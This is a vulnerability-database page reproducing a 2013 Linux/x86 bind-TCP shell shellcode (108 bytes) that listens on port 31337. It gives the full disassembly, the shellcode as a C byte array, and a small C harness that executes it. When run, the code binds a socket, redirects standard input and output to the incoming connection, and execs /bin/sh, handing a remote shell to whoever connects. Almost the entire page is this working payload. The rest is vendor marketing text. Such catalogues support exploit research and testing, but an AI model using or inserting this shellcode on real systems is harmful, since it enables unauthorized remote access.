Vulners
Lucene search
Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)
/*
Title : tcpbindshell (108 bytes)
Date : 15 May 2013
Author : Russell Willis <[email protected]>
Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: b0 66 mov al,0x66
804806a: b3 01 mov bl,0x1
804806c: 51 push ecx
804806d: 6a 06 push 0x6
804806f: 6a 01 push 0x1
8048071: 6a 02 push 0x2
8048073: 89 e1 mov ecx,esp
8048075: cd 80 int 0x80
8048077: 89 c6 mov esi,eax
8048079: b0 66 mov al,0x66
804807b: b3 02 mov bl,0x2
804807d: 52 push edx
804807e: 66 68 7a 69 pushw 0x697a
8048082: 66 53 push bx
8048084: 89 e1 mov ecx,esp
8048086: 6a 10 push 0x10
8048088: 51 push ecx
8048089: 56 push esi
804808a: 89 e1 mov ecx,esp
804808c: cd 80 int 0x80
804808e: b0 66 mov al,0x66
8048090: b3 04 mov bl,0x4
8048092: 6a 01 push 0x1
8048094: 56 push esi
8048095: 89 e1 mov ecx,esp
8048097: cd 80 int 0x80
8048099: b0 66 mov al,0x66
804809b: b3 05 mov bl,0x5
804809d: 52 push edx
804809e: 52 push edx
804809f: 56 push esi
80480a0: 89 e1 mov ecx,esp
80480a2: cd 80 int 0x80
80480a4: 89 c3 mov ebx,eax
80480a6: 31 c9 xor ecx,ecx
80480a8: b1 03 mov cl,0x3
080480aa <dupfd>:
80480aa: fe c9 dec cl
80480ac: b0 3f mov al,0x3f
80480ae: cd 80 int 0x80
80480b0: 75 f8 jne 80480aa
80480b2: 31 c0 xor eax,eax
80480b4: 52 push edx
80480b5: 68 6e 2f 73 68 push 0x68732f6e
80480ba: 68 2f 2f 62 69 push 0x69622f2f
80480bf: 89 e3 mov ebx,esp
80480c1: 52 push edx
80480c2: 53 push ebx
80480c3: 89 e1 mov ecx,esp
80480c5: 52 push edx
80480c6: 89 e2 mov edx,esp
80480c8: b0 0b mov al,0xb
80480ca: cd 80 int 0x80
*/
#include <stdio.h>
/*
Port High/Low bytes
Current port 31337 (7a69)
*/
#define PORTHL "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66"
"\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89"
"\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52"
"\x66\x68"PORTHL"\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04"
"\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3"
"\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"
"\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1